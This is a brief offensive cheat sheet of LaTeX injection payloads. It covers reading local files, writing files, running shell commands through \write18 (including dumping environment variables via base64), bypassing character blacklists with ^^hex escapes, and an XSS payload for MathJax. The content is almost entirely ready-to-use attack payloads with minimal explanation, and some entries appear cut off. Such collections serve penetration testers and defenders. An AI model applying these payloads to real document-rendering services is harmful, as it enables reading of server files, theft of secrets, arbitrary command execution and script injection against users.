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LaTex Injection

You might need to adjust injection with wrappers as \[ or $.

Read file

Read file and interpret the LaTeX code in it:

\include{somefile} # load .tex file (somefile.tex)

Read single lined file:

\read\file to\line

Read multiple lined file:

    \read\file to\fileline

Read text file, without interpreting the content, it will only paste raw file content:


If injection point is past document header (\usepackage cannot be used), some control characters can be deactivated in order to use \input on file containing $, #, _, &, null bytes, ... (eg. perl scripts).

\catcode `\$=12
\catcode `\#=12
\catcode `\_=12
\catcode `\&=12

To bypass a blacklist try to replace one character with it's unicode hex value. - ^^41 represents a capital A - ^^7e represents a tilde (~) note that the ā€˜eā€™ must be lower case


Write file

Write single lined file:

\write\outfile{Line 2}
\write\outfile{I like trains}

Command execution

The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.

\immediate\write18{id > output}

If you get any LaTex error, consider using base64 to get the result without bad characters (or use \verbatiminput):

\immediate\write18{env | base64 > test.tex}

Cross Site Scripting

From @EdOverflow


in mathjax

\unicode{<img src=1 onerror="<ARBITRARY_JS_CODE>">}
